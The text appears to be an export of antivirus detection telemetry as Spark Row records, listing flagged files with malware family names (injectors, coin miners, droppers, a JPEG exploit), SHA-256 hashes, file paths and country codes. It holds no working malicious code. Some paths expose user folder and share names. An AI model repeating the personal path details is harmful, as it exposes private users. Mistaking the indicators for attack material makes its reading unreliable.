  Row(detection=Row(filename='avscan-20181102-055649-0f745828', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055649-0F745828', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-073043-b41a3982', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e5507ae\\AVSCAN-20181102-072706-82C0C513\\AVSCAN-20181102-073043-B41A3982', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:30:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:32:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5fb7ed1e268c301f8c510743bb7b8c756f25b9affcc4d1880f2a5b7f42b18884.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.available\\Avira\\5FB7ED1E268C301F8C510743BB7B8C756F25B9AFFCC4D1880F2A5B7F42B18884.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5fb7ed1e268c301f8c510743bb7b8c756f25b9affcc4d1880f2a5b7f42b18884', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:56:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rhino.6-patch.exe', filepath='g:\\meine ablage\\008_software\\rhino 6.2\\rhino.6-patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T12:13:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054746-cbab0bb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054746-CBAB0BB1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054641-a47d6879', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054641-A47D6879', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:49:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230918-dda6df59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1d5c61d\\AVSCAN-20181102-230905-DBB67FA7\\AVSCAN-20181102-230918-DDA6DF59', filesize=5696000, name='TR/CoinLoader.JY.#M1.#R1'), hash='517be7d335a0593e425740975aacd37de9dd347a705a6862ce20b2e03ffe9622', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T22:09:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050705-1c7bee0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050705-1C7BEE0C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051502-38a4a154', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051502-38A4A154', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='\\\\Srv-adc\\users$\\Marius.Stoleriu\\Desktop\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T05:40:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061437-8bf06ef3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061437-8BF06EF3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4badc1401f54853afb2ddb6af56587654b53373780a997941994a2641b4caf88', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4BADC1401F54853AFB2DDB6AF56587654B53373780A997941994A2641B4CAF88', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4badc1401f54853afb2ddb6af56587654b53373780a997941994a2641b4caf88', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:46:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054611-92c7725c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054611-92C7725C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bookmarks.pvp', filepath='C:\\PROGRAM FILES\\pdf\\Plugins.x86\\Bookmarks.pvp', filesize=320000, name='HEUR/APC.#M1.#R1'), hash='609bfd702b15a22dd5b3e5b8a90f798713c01cd6562df9c005843478b3adcfab', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Desktop\\\\\\\\лиля\\\\\\\\задачи\\\\\\\\анализ задачи.pdf\\\\\\"', country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\pdf\\PDFXEdit.exe', parentsize=390200, timestamp='2018-11-02T06:09:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133813-661cecaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8c0b591\\AVSCAN-20181102-133739-60ECB005\\AVSCAN-20181102-133813-661CECAF', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050310-90b3a613', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050310-90B3A613', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050731-2c507e9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050731-2C507E9A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061655-ddd5af6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061655-DDD5AF6D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061807-08bee27c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061807-08BEE27C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062518-09b116ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062518-09B116AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053048-6cf7db96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053048-6CF7DB96', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061847-207c41a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061847-207C41A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050935-75d17b5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050935-75D17B5F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060845-b9d3e066', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060845-B9D3E066', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051645-764d8efa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051645-764D8EFA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051852-c1c12f12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051852-C1C12F12', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050913-691c17d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050913-691C17D9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060817-a93bb866', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060817-A93BB866', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061302-534b60a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061302-534B60A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061123-183c61dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061123-183C61DC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053854-8e5cab7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053854-8E5CAB7D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061704-e37fe2c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061704-E37FE2C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060836-b464ce6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060836-B464CE6A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055504-d0865d7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055504-D0865D7E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051807-a7629379', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051807-A7629379', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050921-6dc30beb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050921-6DC30BEB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052618-cbe0eda5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052618-CBE0EDA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055130-51518b2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055130-51518B2A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052920-3873e227', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052920-3873E227', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060326-fbdcb492', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060326-FBDCB492', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061846-200ba932', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061846-200BA932', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055941-75e84331', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055941-75E84331', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060935-d7855912', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060935-D7855912', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='m2.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\ZBD\\M2\\M2.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='746f5b376e8edbeea7273c742f85cd1fd492337f0be472185bee06679cd180a3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055456-cbaef80c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055456-CBAEF80C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='7c1e825a4424cbd22e4f90a2df068a0ee4f3495ac3e7dee8625048a6c3613b4b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:33:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055949-7abf2629', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055949-7ABF2629', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051250-ea5c6d04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051250-EA5C6D04', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062651-40f1d007', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062651-40F1D007', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061503-9b3bacab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061503-9B3BACAB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055145-59be18f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055145-59BE18F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:43Z'), dt=datetime.date(2018, 11, 2)),
